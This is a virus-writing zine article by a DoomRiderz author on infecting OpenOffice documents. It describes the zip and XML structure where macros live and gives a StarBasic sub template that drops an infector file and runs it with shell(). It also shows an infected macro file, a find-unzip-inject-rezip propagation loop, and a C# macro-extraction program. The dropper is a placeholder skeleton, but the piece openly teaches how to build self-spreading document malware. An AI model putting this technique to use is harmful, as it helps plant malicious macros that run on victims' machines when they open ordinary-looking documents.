Some ideas about OpenOffice infection
WarGame / DooMRiderZ
<![CDATA[
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++ Some ideas about OpenOffice infection by [WarGame/DoomRiderz] ++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1) Introduction
2) How an openoffice document is made
3) How to infect
4) Code
5) Last words
6) Greetz
1) Introduction
This article will try to explain a new way of infecting openoffice documents.
Other OO virii have been written using the basic programming language offered by OO, like
Starbucks, Stardust or the multi platform BadBunny.
It is possible to infect the documents using their simple structure.
Let's go!
2) How an openoffice document is made
An OO document is simply a zip archive, so you can "open" a document with any archiving program.
This is what you get (it should be the same for all OO documents, created by writer,calc, draw etc...):
content.xml <- a plain text XML file
meta.xml <- a plain text XML file
settings.xml <- a plain text XML file
styles.xml <- a plain text XML file
mimetype <- a plain text file
META-INF <- a directory
Configurations2 <- a directory
Thumbnails <- a directory
Basic <- a directory (very interesting!)
How you can see the archive contains text files and directories, I will not waste much time explaining
all of them, their name suggest their meaning.
Looking deeper I noticed the directory "Basic", it contains the macros defined in the document.
This subdirectory contains:
script-lc.xml <- a plain text XML file
Standard <- a directory
The directory "Standard" contains:
script-lb.xml <- a plain text XML file
UserDefined.xml <- a plain text XML file (the name of this file depends by the user that created the macros)
Eureka! The file "UserDefined.xml" contains the basic code of the macros!!!
We have to play with this file to infect a document using our own macro code.
This is what it contains in my example file "Example.odt" (its name is ExampleMacros.xml):
-- ExampleMacros.xml --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="ExampleMacros" script:language="StarBasic">REM first macro
Sub example1
msgbox "example1",,"example1"
End Sub
REM second macro
Sub example2
msgbox "example2",,"example2"
End Sub
</script:module>
-----------------------
The file is an xml document, it can be parsed in many ways, using libraries or writing your own procedures.
We should do a check, infact it's possible to save the documents in an encrypted form using a password,
let's look at script-lb.xml (this one is in my example file).
--- script-lb.xml ---
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library:library PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "library.dtd">
<library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard" library:readonly="false" library:passwordprotected="false">
<library:element library:name="ExampleMacros"/>
</library:library>
---------------------
We have to check library:passwordprotected, if it is set to true, the document is encrypted.
3) How to infect
We can infect it in two ways (maybe there are more, be creative!)
1 - Adding (or modifying an existing Sub) our own code that drops&executes the code of the infector
2 - Injecting a full functional oo virus written in basic
I prefer the first one (the second one is useless for me), so our injected code should look like this:
----- Injected sub -----
Sub DropInfector
open path_to_write_the_infector for output as #1
print #1,... REM write the code of the infector
close #1
shell(path_to_write_the_infector,0) REM execute the infector
End Sub
------------------------
So my example file "ExampleMacros.xml" would become:
-- ExampleMacros.xml (infected) --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="ExampleMacros" script:language="StarBasic">REM first macro
Sub example1
msgbox "example1",,"example1"
End Sub
REM second macro
Sub example2
msgbox "example2",,"example2"
End Sub
REM Sub added by our infector
Sub DropInfector
open path_to_write_the_infector for output as #1
print #1,... REM write the code of the infector
close #1
shell(path_to_write_the_infector,0) REM execute the infector
End Sub
</script:module>
----------------------------------
Our Sub could be also multi platform, look at BadBunny in DoomRiderz#1 for an example, to be more portable.
This task could be done in languages like python or C++ that have libraries that help you to accomplish
this job (unzipping,xml parsing,rezipping).
This is the flow of the infection process:
1 - Find OpenOffice documents (FindFirstFile()/FindNextFile() for Windows, opendir() for unix like systems)
2 - Unzip the found document (zlib can help)
3 - Infect the UserDefined.xml file in the Standard directory
4 - Rezip the document
5 - Go to the first step
An other idea for a nice payload could be editing "content.xml", so the user will see your message!
4) Code
This is an example C# program that shows you how to parse the xml file containing the macro code:
-- GetMacroCode.cs --
// you will need "module.dtd" in the same directory of the program
using System;
using System.Collections.Generic;
using System.Text;
using System.Xml;
namespace GetMacroCode
{
class Program
{
static void Main(string[] args)
{
if (args.Length == 0)
{
Console.WriteLine("Specify the xml file!");
}
else
{
// thx to Retr0
XmlReaderSettings settings = new XmlReaderSettings();
settings.ProhibitDtd = false;
XmlReader xmlRead = XmlReader.Create(args[0],settings);
while (xmlRead.Read())
{
if (xmlRead.Name == "script:module")
{
string macro_code = xmlRead.ReadString(); // macro code is here
Console.WriteLine(macro_code);
}
}
xmlRead.Close();
}
}
}
}
---------------------
You will need also the file module.dtd (it's attached to this article) to make this proggy works.
(My suggestion is to read the xml file in a "raw" way, without using classes or other stuff).
5) Last words
The explained technique can be expanded in more original ways.
OO is a nice suite, but its format is too vulnerable to this kind of attacks.
For any comments you can send an e-mail to wargame89@yahoo.it
Web: http://vx.netlux.org/wargamevx - http://vx.netlux.org/doomriderz
Bye!
6) Greetz
A big thx goes to all #virus,#eof-project,#vx-lab @ undernet
]]>